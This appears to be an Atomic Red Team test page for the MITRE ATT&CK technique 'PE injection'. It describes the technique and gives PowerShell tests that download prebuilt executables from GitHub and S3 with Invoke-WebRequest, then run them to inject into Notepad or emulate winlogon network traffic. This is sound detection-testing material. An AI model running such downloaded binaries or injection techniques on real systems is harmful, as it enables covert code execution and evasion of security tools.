# T1055.002 - Process Injection: Portable Executable Injection
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/002)
<blockquote>Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </blockquote>

## Atomic Tests

- [Atomic Test #1 - Portable Executable Injection](#atomic-test-1---portable-executable-injection)

- [Atomic Test #2 - Winlogon Network Communication Over TCP Port 80 - Potential Process Injection](#atomic-test-2---winlogon-network-communication-over-tcp-port-80---potential-process-injection)


<br/>

## Atomic Test #1 - Portable Executable Injection
This test injects a portable executable into a remote Notepad process memory using Portable Executable Injection and base-address relocation techniques. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds.

**Supported Platforms:** Windows


**auto_generated_guid:** 578025d5-faa9-4f6d-8390-aae739d503e1





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | PE binary | path | PathToAtomicsFolder&#92;T1055.002&#92;bin&#92;RedInjection.exe|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
```

#### Cleanup Commands:
```powershell
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
```



#### Dependencies:  Run with `powershell`!
##### Description: Portable Executable to inject must exist at specified location (#{exe_binary})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.002/bin/RedInjection.exe" -OutFile "#{exe_binary}"
```




<br/>
<br/>

## Atomic Test #2 - Winlogon Network Communication Over TCP Port 80 - Potential Process Injection
This exe, when launched, attempts to connect to TWO http sites to emulate outbound HTTP activity from the winlogon.exe process.

**Supported Platforms:** Windows


**auto_generated_guid:** d69486f2-9fd8-46f1-91b1-2bbbff49b9f6





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| winlogon_exe | Path of Winlogon executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;winlogon.exe|


#### Attack Commands: Run with `powershell`! 


```powershell
"#{winlogon_exe}"
```




#### Dependencies:  Run with `powershell`!
##### Description: Winlogon executable must exist on disk at specified location (#{winlogon_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{winlogon_exe}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "#{winlogon_exe}") -Force | Out-Null
Invoke-WebRequest "https://cyborg-public.s3.amazonaws.com/emulation-validation/winlogon.exe" -OutFile "#{winlogon_exe}"
```




<br/>
